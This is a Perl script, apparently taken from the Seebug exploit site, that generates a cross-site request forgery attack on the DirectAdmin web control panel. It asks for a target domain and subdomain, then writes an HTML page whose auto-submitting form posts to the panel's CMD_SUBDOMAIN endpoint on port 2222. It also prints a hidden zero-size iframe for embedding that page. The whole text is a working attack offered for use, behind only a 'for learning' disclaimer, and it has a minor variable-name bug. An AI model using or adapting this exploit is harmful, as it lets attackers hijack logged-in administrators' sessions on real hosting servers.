#!/usr/bin/perl ######################################################################## # Title : DirectAdmin Web Control Panel � 2005 JBMC Software # Author : Onur T�RKE�HAN # Homepage : http://www.directadmin.com/ # tested on : Windows 7 # Seni Unutmayacagiz MIRIM- system("cls"); print " +----------------------------------------+\n | directadmin csrf vuln creator by turkeshan |\n | cyber-warrior.org lojistik grup |\n +----------------------------------------+\n Loading ...\n "; sleep(3); print "Site aDi "; $h = <STDIN>; chomp $h; print "Sub Domain Adi "; $sub = <STDIN>; chomp $usub; $html = '<form name=info action="http://'.$h.':2222/CMD_SUBDOMAIN?domain='.$h.'" method="POST"> <input type=hidden name=action value="create"> <input type=hidden name=domain value="'.$h.'"> <input type=text name=subdomain size=8 value="'.$sub.'"> <script>document.info.submit();</script> </form>'; sleep(2); print "olusturuluyor ...\n"; open(XSS , '>>csrf.htm'); print XSS $html; close(XSS); print "olusturuldu .. \n"; sleep(2); print "dosyayi sitenize upload edin ve dosya ismini yazin"; $csrf = <STDIN>; chomp $csrf; $done = '<iframe id="iframe" src="'.$csrf.'" width="0" height="0"></iframe>'; sleep(2); print "exploit basariyla tamamlandi \n"; print $done."\n"; print ""; print "\n hayrini gorun .. ";
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论